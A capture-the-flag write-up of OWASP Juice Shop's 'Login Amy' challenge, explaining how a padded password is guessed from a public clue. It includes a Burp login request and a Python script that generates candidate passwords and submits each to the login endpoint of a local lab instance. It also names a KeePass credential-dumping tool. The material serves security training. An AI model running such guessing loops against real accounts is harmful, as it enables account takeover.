Hacking OWASP’s Juice Shop Pt. 25: Login Amy

Challenge: 

Name: Login Amy

Description: Log in with Amy’s original user credentials. (This could take 93.83 billion trillion trillion centuries to brute force, but luckily she did not read the “One Important Final Note”)

Difficulty: 3 stars

Category: Sensitive Data Exposure

Expanded Description: https://pwning.owasp-juice.shop/part2/sensitive-data-exposure.html

Tools used:

Burp, FoxyProxy

Resources used:

None.

Methodology: 

As usual, my first stop was the expanded description. One of its bullet points states that “The challenge description, in addition to an image of Amy and Kif, contains a few sentences which give away some information how Amy decided to strengthen her password.” Only two phrases in the challenge description stood out as unique: “93.83 billion trillion trillion centuries” and “One Important Final Note”. So I started by googling the one I assumed would be the less common of the two.

Screenshot: Google search for “93.83 billion trillion trillion centuries” (about 1,400 results). The top hit is GRC's “Password Haystacks: How Well Hidden is Your Needle?” at www.grc.com/haystack, whose snippet mentions “assuming one hundred trillion guesses per second” and a homebrew password cracking system that cracks at 33.1 billion passwords per second.

That top link looked curiously relevant to this challenge, so I opened it and scrolled through until I came across the second unique phrase, “One Important Final Note”. That note describes padding: pick a short password you can actually remember (GRC's example is “D0g”) and pad it with a long run of a single character, such as periods, to inflate the search space.

Since the expanded description also states that “Amy – being a little dimwitted – did not put nearly enough effort and creativity into the password selection process”, I figured she had copied the padding scheme exactly, including the same number of periods after her password as in GRC's example. Then, based on the image in the expanded description, I worked out that Kif must have been the name she used as the base of her password (with a digit in place of the vowel, just as in GRC's example).

Screenshot: Burp Suite Repeater, target http://localhost:3000. Request: POST /rest/user/login HTTP/1.1, Host: localhost:3000, Content-Type: application/json, Content-Length: 65, with a JSON body containing "email": "amy@juice-sh.op" and the guessed "password". Response: HTTP/1.1 200 OK, Content-Type: application/json; charset=utf-8, Content-Length: 825, X-Content-Type-Options: nosniff, X-Frame-Options: SAMEORIGIN, Feature-Policy: payment 'self', Date: Mon, 02 Nov 2020 21:35:09 GMT, with a JSON body containing an "authentication" object holding a "token" (a JWT, truncated in the screenshot), "bid": 4 and "umail": "amy@juice-sh.op".

Juice Shop then displays the banner: You successfully solved a challenge: Login Amy (Log in with Amy's original user credentials. (This could take 93.83 billion trillion trillion centuries to brute force, but luckily she did not read the "One Important Final Note"))
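The whole procedure above, as an added example that is not from the original post or from the Juice Shop project: turn the two clues (the name Kif, a digit-for-vowel substitution, and period padding of unknown length) into a small candidate list, compare the size of that list with the GRC-style “haystack” the challenge description quotes, and submit each candidate to Juice Shop's login endpoint. The base URL http://localhost:3000 (as in the screenshot), the character-class sizes 26/26/10/33, the padding range 1 to 32, the 1,000 guesses-per-second rate and the treatment of a 401 as a wrong guess are assumptions; “D0g” followed by 21 periods is GRC's own 24-character sample, not Amy's password.

```python
"""Hypothesis-driven guess list for the Login Amy challenge (added example)."""
import itertools
import json
import urllib.error
import urllib.request

# Digit-for-vowel substitutions, as in GRC's "D0g" padding example (assumed set).
LEET = {"a": "4", "e": "3", "i": "1", "o": "0"}


def leet_variants(word):
    """Every way of replacing zero or more vowels of `word` with LEET digits."""
    options = [(c, LEET[c.lower()]) if c.lower() in LEET else (c,) for c in word]
    return sorted({"".join(p) for p in itertools.product(*options)})


def padded_candidates(words, pad_char=".", min_pad=1, max_pad=32):
    """Each base word followed by min_pad..max_pad copies of the padding character."""
    return [w + pad_char * n for w in words for n in range(min_pad, max_pad + 1)]


def haystack_size(password):
    """GRC-style search space: every string up to this length over the character
    classes the password uses (assumed sizes: 26 upper, 26 lower, 10 digits, 33 symbols)."""
    alphabet = 0
    if any(c.islower() for c in password):
        alphabet += 26
    if any(c.isupper() for c in password):
        alphabet += 26
    if any(c.isdigit() for c in password):
        alphabet += 10
    if any(not c.isalnum() for c in password):
        alphabet += 33
    return sum(alphabet ** n for n in range(1, len(password) + 1))


def centuries_to_exhaust(space, guesses_per_second):
    """Time to enumerate `space` guesses at the given rate, in centuries."""
    return space / guesses_per_second / (100 * 365.25 * 86400)


def try_login(base_url, email, password, timeout=5):
    """POST to Juice Shop's /rest/user/login. Returns the JWT on success,
    None on a 401 (assumed to mean wrong credentials); other errors propagate."""
    body = json.dumps({"email": email, "password": password}).encode()
    req = urllib.request.Request(
        base_url + "/rest/user/login",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return json.load(resp)["authentication"]["token"]
    except urllib.error.HTTPError as err:
        if err.code == 401:
            return None
        raise


if __name__ == "__main__":
    candidates = padded_candidates(leet_variants("Kif"))
    grc_sample = "D0g" + "." * 21  # GRC's own 24-character padding example
    print(f"haystack for a 24-char padded password: {haystack_size(grc_sample):.3g} strings, "
          f"{centuries_to_exhaust(haystack_size(grc_sample), 1000):.3g} centuries at 1,000 guesses/s")
    print(f"candidates once the construction rule is known: {len(candidates)}")
    try:
        for guess in candidates:  # assumed local instance, as in the screenshot
            token = try_login("http://localhost:3000", "amy@juice-sh.op", guess)
            if token:
                print(f"logged in as amy with a {len(guess)}-character password; token: {token[:20]}...")
                break
    except OSError as err:
        print(f"no Juice Shop reachable at localhost:3000 ({err})")
```

The point of the haystack arithmetic is that a 24-character padded password really does sit in a search space on the order of 10^47 strings, which at 1,000 online guesses per second is the same billion-trillion-trillion-centuries range the challenge description quotes; but an attacker who has read the same note only needs the 64 candidates this script produces. The login helper re-raises anything other than a 401, so a rate limit or server error is not silently counted as a miss.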

Prevention and Mitigation Strategies:

Take password security seriously. If you absolutely must share a password with someone else (spouse, shifty stranger, etc.), do not send it by SMS, email, or any other electronic medium without encrypting it first. Generating and using an RSA key pair is a pain (not to mention getting the other person to do it), but it beats having your identity stolen.

Use unique passwords for every account you have. When I took my first security course a year ago I was one of those people who reused a few passwords over and over. Today I carry a cipher card with me everywhere I go (qwertycards.com sells credit-card-sized unique ciphers for $5), and to keep myself from forgetting any of the dozen different password character restrictions I've encountered, I store all of my passwords in a password manager.

Password managers aren't 100% secure either (nothing is). But someone has to seriously want your passwords to successfully use a tool like KeeFarce, which dumps the credentials of a running KeePass 2.x instance, against you.

Lessons Learned and Things Worth Mentioning: 

Google is a fantastic resource when it comes to OSINT data collection and research. Learning how to craft more effective queries is tremendously helpful for separating signal from noise, though sometimes a plain old query works just fine.
